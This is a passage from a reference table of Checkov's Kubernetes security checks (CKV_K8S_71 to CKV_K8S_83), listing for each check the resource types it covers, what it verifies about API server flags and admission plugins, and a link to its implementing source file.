[ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2934 | CKV_K8S_71 | resource | ReplicaSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | 
[ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2935 | CKV_K8S_71 | resource | ReplicationController | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2936 | CKV_K8S_71 | resource | StatefulSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2937 | CKV_K8S_72 | resource | CronJob | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2938 | CKV_K8S_72 | resource | DaemonSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2939 | CKV_K8S_72 | resource | Deployment | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2940 | CKV_K8S_72 | resource | DeploymentConfig | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | 
[ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2941 | CKV_K8S_72 | resource | Job | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2942 | CKV_K8S_72 | resource | Pod | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2943 | CKV_K8S_72 | resource | PodTemplate | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2944 | CKV_K8S_72 | resource | ReplicaSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2945 | CKV_K8S_72 | resource | ReplicationController | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2946 | CKV_K8S_72 | resource | StatefulSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | 
[ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2947 | CKV_K8S_73 | resource | CronJob | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2948 | CKV_K8S_73 | resource | DaemonSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2949 | CKV_K8S_73 | resource | Deployment | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2950 | CKV_K8S_73 | resource | DeploymentConfig | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2951 | CKV_K8S_73 | resource | Job | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2952 | CKV_K8S_73 | resource | Pod | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | 
[ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2953 | CKV_K8S_73 | resource | PodTemplate | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2954 | CKV_K8S_73 | resource | ReplicaSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2955 | CKV_K8S_73 | resource | ReplicationController | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2956 | CKV_K8S_73 | resource | StatefulSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2957 | CKV_K8S_74 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2958 | CKV_K8S_74 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2959 | CKV_K8S_74 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2960 | CKV_K8S_74 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2961 | CKV_K8S_74 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2962 | CKV_K8S_74 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2963 | CKV_K8S_74 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2964 | CKV_K8S_74 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2965 | CKV_K8S_74 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2966 | CKV_K8S_74 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2967 | CKV_K8S_75 | resource | CronJob | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2968 | CKV_K8S_75 | resource | DaemonSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2969 | CKV_K8S_75 | resource | Deployment | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2970 | CKV_K8S_75 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2971 | CKV_K8S_75 | resource | 
Job | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2972 | CKV_K8S_75 | resource | Pod | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2973 | CKV_K8S_75 | resource | PodTemplate | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2974 | CKV_K8S_75 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2975 | CKV_K8S_75 | resource | ReplicationController | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2976 | CKV_K8S_75 | resource | StatefulSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2977 | CKV_K8S_77 | resource | CronJob | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2978 | CKV_K8S_77 | resource | DaemonSet | 
Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2979 | CKV_K8S_77 | resource | Deployment | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2980 | CKV_K8S_77 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2981 | CKV_K8S_77 | resource | Job | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2982 | CKV_K8S_77 | resource | Pod | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2983 | CKV_K8S_77 | resource | PodTemplate | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2984 | CKV_K8S_77 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2985 | CKV_K8S_77 | resource | ReplicationController | Ensure 
that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2986 | CKV_K8S_77 | resource | StatefulSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2987 | CKV_K8S_78 | resource | AdmissionConfiguration | Ensure that the admission control plugin EventRateLimit is set | Kubernetes | [ApiServerAdmissionControlEventRateLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py) | -| 2988 | CKV_K8S_79 | resource | CronJob | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2989 | CKV_K8S_79 | resource | DaemonSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2990 | CKV_K8S_79 | resource | Deployment | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2991 | CKV_K8S_79 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | 
[ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2992 | CKV_K8S_79 | resource | Job | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2993 | CKV_K8S_79 | resource | Pod | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2994 | CKV_K8S_79 | resource | PodTemplate | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2995 | CKV_K8S_79 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2996 | CKV_K8S_79 | resource | ReplicationController | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2997 | CKV_K8S_79 | resource | StatefulSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2998 | CKV_K8S_80 | 
resource | CronJob | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 2999 | CKV_K8S_80 | resource | DaemonSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3000 | CKV_K8S_80 | resource | Deployment | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3001 | CKV_K8S_80 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3002 | CKV_K8S_80 | resource | Job | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3003 | CKV_K8S_80 | resource | Pod | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3004 | CKV_K8S_80 | resource | PodTemplate | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | 
[ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3005 | CKV_K8S_80 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3006 | CKV_K8S_80 | resource | ReplicationController | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3007 | CKV_K8S_80 | resource | StatefulSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 3008 | CKV_K8S_81 | resource | CronJob | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3009 | CKV_K8S_81 | resource | DaemonSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3010 | CKV_K8S_81 | resource | Deployment | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | 
[ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3011 | CKV_K8S_81 | resource | DeploymentConfig | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3012 | CKV_K8S_81 | resource | Job | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3013 | CKV_K8S_81 | resource | Pod | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3014 | CKV_K8S_81 | resource | PodTemplate | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3015 | CKV_K8S_81 | resource | ReplicaSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3016 | CKV_K8S_81 | resource | ReplicationController | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes 
| [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3017 | CKV_K8S_81 | resource | StatefulSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | -| 3018 | CKV_K8S_82 | resource | CronJob | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3019 | CKV_K8S_82 | resource | DaemonSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3020 | CKV_K8S_82 | resource | Deployment | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3021 | CKV_K8S_82 | resource | DeploymentConfig | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3022 | CKV_K8S_82 | resource | Job | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3023 | CKV_K8S_82 | resource | Pod | Ensure that the admission control 
plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3024 | CKV_K8S_82 | resource | PodTemplate | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3025 | CKV_K8S_82 | resource | ReplicaSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3026 | CKV_K8S_82 | resource | ReplicationController | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3027 | CKV_K8S_82 | resource | StatefulSet | Ensure that the admission control plugin ServiceAccount is set | Kubernetes | [ApiServerServiceAccountPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountPlugin.py) | -| 3028 | CKV_K8S_83 | resource | CronJob | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3029 | CKV_K8S_83 | resource | DaemonSet | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3030 | CKV_K8S_83 | resource | Deployment | 
Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3031 | CKV_K8S_83 | resource | DeploymentConfig | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3032 | CKV_K8S_83 | resource | Job | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3033 | CKV_K8S_83 | resource | Pod | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | [ApiServerNamespaceLifecyclePlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerNamespaceLifecyclePlugin.py) | -| 3034 | CKV_K8S_83 | resource | PodTemplate | Ensure that the admission control plugin NamespaceLifecycle is set | Kubernetes | 